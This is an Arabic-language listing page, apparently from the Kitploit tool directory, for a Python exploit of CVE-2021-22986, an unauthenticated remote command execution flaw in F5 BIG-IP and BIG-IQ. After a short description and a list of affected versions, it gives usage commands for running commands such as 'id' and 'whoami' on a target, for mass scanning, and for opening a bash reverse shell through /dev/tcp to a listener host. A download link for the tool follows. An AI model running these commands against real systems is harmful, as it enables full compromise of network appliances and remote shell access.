Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-22986 — استغلال Python لـ CVE-2021-22986، يتيح RCE غير مصادق عليه على F5 BIG-IP و BIG-IQ عبر iControl REST، مع تنفيذ الأوامر، والفحص الجماعي، وميزات القشرة العكسية. | Kitploit
أدوات/GitHubGitHub/amitlttwo/cve-2021-22986
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHubamitlttwo/cve-2021-22986

CVE-2021-22986

استغلال Python لـ CVE-2021-22986، يتيح RCE غير مصادق عليه على F5 BIG-IP و BIG-IQ عبر iControl REST، مع تنفيذ الأوامر، والفحص الجماعي، وميزات القشرة العكسية.

عرض المستودع
منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-22986

تسمح هذه الثغرة للمهاجمين غير الموثوقين الذين لديهم وصول شبكي إلى واجهة iControl REST، عبر واجهة إدارة BIG-IP وعناوين IP الذاتية، بتنفيذ أوامر نظام عشوائية، وإنشاء أو حذف الملفات، وتعطيل الخدمات. لا يمكن استغلال هذه الثغرة إلا من خلال مستوى التحكم (control plane) وليس من خلال مستوى البيانات (data plane). قد يؤدي الاستغلال إلى اختراق كامل للنظام. نظام BIG-IP في وضع Appliance معرض أيضًا للخطر.

المنتج المعرض للخطر

F5 BIG-IQ 6.0.0-6.1.0 F5 BIG-IQ 7.0.0-7.0.0.1 F5 BIG-IQ 7.1.0-7.1.0.2 F5 BIG-IP 12.1.0-12.1.5.2 F5 BIG-IP 13.1.0-13.1.3.5 F5 BIG-IP 14.1.0-14.1.3.1 F5 BIG-IP 15.1.0-15.1.2 F5 BIG-IP 16.0.0-16.0.1

الاستخدام

root@kitploit:~
python3 CVE_2021_22986.py

اكتشاف الثغرة

root@kitploit:~
python3 CVE_2021_22986.py -v true -u https://192.168.174.164

تنفيذ الأوامر

root@kitploit:~
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c id

تنفيذ الأمر whoami

root@kitploit:~
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c whoami

فحص جماعي

root@kitploit:~
python3 CVE_2021_22986.py -s true -f check.txt

شيل عكسي

root@kitploit:~
python3 CVE_2021_22986.py -r true -u https://192.168.174.164 -c "bash -i >&/dev/tcp/192.168.174.129/8888 0>&1"

PoC جديد

root@kitploit:~
python3 newpoc.py https://192.168.174.164

المراجع:-

  • https://support.f5.com/csp/article/K03009991

  • https://github.com/safesword/F5_RCE

  • https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986

  • https://github.com/Udyz/CVE-2021-22986-SSRF2RCE

تنزيل الأداة